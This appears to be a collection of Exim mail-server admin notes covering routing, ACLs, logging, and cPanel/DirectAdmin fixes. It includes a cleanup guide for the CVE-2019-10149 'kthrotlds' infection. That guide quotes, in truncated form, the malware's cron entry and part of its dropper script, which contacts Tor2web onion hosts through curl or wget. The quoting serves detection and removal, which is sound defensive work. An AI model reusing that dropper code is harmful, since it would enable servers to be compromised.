vi /etc/exim.conf
spamgateway_smarthost_router:
driver = manualroute
domains = ! +local_domains
ignore_target_hosts = 127.0.0.0/8
condition = "${perl{check_limits}}"
transport = spamgateway_smarthost_transport
route_list = $domain mx.smarthost.com::587
spamgateway_smarthost_transport:
driver = smtp
hosts_require_tls = *
vi /etc/localdomains
domaina.com
domainb.com
vi /etc/exim/exim.conf
domainlist sender_domains = lsearch;/etc/localdomains
acl_check_rcpt:
accept hosts = +relay_from_hosts
sender_domains = +sender_domains
control = submission
control = dkim_disable_verify
accept hosts = +relay_from_hosts
sender_domains = +sender_domains
control = submission
control = dkim_disable_verify
require message = bad sender domain
domains = +sender_domains
tail -f /var/log/exim/main.log
2020-05-20 20:55:55 H=mail.server.com [xx.xx.xx.xx] F=<> rejected RCPT
2020-05-20 20:55:55 H=mail.server.com [xx.xx.xx.xx] F=<> rejected RCPT
Exim Configuration Manager -> Advanced Editor
log_selector:
+incoming_port +smtp_connection +all_parents +retry_defer +subject +arguments +received_recipients +address_rewrite +arguments +connection_reject +delay_delivery +delivery_size +dnslist_defer +incoming_interface +lost_incoming_connection +queue_run +received_sender +sender_on_delivery +size_reject +skip_delivery +smtp_confirmation +smtp_protocol_error +smtp_syntax_error +tls_cipher +tls_peerdn
If you found some strange name process like [kthrotlds] running on your server, it
means your server could be affected by CVE-2019-10149 Exim security exploit. Of course process name can be different, first of all you need to kill it:
pkill -9 -f kthrotlds
ps aux | grep kthrotlds # To check if process still exists
Its binnary file created in /usr/bin/ directory:
/usr/bin/[kthrotlds]
ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
You need quarantine it or just remove.
You can find TCP connection on this process, so its not kernel procesas like it would like to pretend in your process list.
While fixing this issue my advice is to stop crond service: service crond stop
Than you should find all files which could be affected:
grep -r passwd /var/spool/cron*
*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to
You need to check /etc, /root, /usr/local/bin for bash/sh scripts with malware code, like:
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST=”https://an7kmd2wp4xo7hpr”
TOR1=”.tor2web.su/”
TOR2=”.tor2web.io/”
TOR3=”.onion.sh/”
RPATH1=’src/ldm’
#LPATH=”${HOME-/tmp}/.cache/”
TIMEOUT=”75″
CTIMEOUT=”22″
COPTS=” -fsSLk –retry 2 –connect-timeout ${CTIMEOUT} –max-time ${TIMEOUT} ”
WOPTS=” –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=${CTIMEOUT} –timeout=${TIMEOUT} ”
tbin=$(command -v passwd); bpath=$(dirname “${tbin}”)
curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi
wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “.wgetrc’-style command” && wget=”$f” && break; done; fi; fi
#CHKCURL=’curl=”curl “; wget=”wget “; if [ “$(whoami)” = “root” ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl=”echo “; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget=”echo “; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; fi; ‘
CHKCURL=’tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to
LBIN8=”kthrotlds”
null=’ >/dev/null 2>&1′
If its cPanel server, you need to check Exim version like this:
whmapi1 installed_versions packages=1|grep exim
exim: 4.91-4
– exim-4.91-4.cp1170.x86_64
or simple exim –version
Exim version 4.91 #1 built 06-Jun-2019 12:52:02
To patch WHM and Exsim, if you have older versions like v76 or v70. To check your WHM version:
whmapi1 installed_versions packages=1|grep whm
cpanel_and_whm: 11.78.0.27
It means 78.0.27
or
cpanel_and_whm: 11.80.0.14
It means 80.0.14
vi /etc/cpupdate.conf
CPANEL=11.76
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily
Than:
/scripts/upcp
Than back:
vi /etc/cpupdate.conf
CPANEL=release
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily
P.s. Also you need to check /root/.ssh/authorized_keys, /etc/cron.d, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly and etc.
You can all modified file during last 5 days:
find /etc/ -mtime -5 -print
This malware script removes all your previous cron tasks, so you need to restore them from your backups and than enable cron service again.
exim show variables
exim -bP | grep size
It should fix Outlook errors like Cannot verify Security Certificate or Internet security warning
Common name: localhost issue
cd /usr/local/directadmin
echo mail_sni=1 >> conf/directadmin.conf
service directadmin restart
cd custombuild
./build update
./build set eximconf yes
./build set eximconf_release 4.5
./build set dovecot_conf yes
./build exim_conf
./build dovecot_conf
vi /etc/exim.routers.pre.conf
smart_route:
driver = manualroute
domains = ! +local_domains
ignore_target_hosts = 127.0.0.0/8
condition = “${perl{check_limits}}”
transport = remote_smtp
route_list = * another.smtp.server
no_more
service exim restart
Locate messages matching a specific size
exiqgrep -s '^..M$'
hostname
grep `hostname` /etc/virtual/domains
if missing add:
echo `hostname` >> /etc/virtual/domains
service exim restart
cp -Ra /var/spool/exim/db{,orig}
service exim stop && rm -rf /var/spool/exim/db/* && service exim start
daemon_smtp_ports = 25 : 587
service exim restart
Exim error: R=dkim_lookuphost T=dkim_remote_smtp defer (-46) H=hostname [xx.xx.xx.xx]: SMTP error from remote mail server after end of data: 451 Local Error or something like this: dkim_lookuphost T=dkim_remote_smtp defer (111): Connection refused
If you are getting this error on cPanel server, you should try disable dkim on your existing users accounts. To do this you can in your WHM panel or using API.
cat /etc/virtual/usage/*
This message can mean user sent emails limit is reached, maybe some user send spam messages. Also it can be really DNS issues.
Fix:
remote_smtp:
driver = smtp
hosts_avoid_tls=*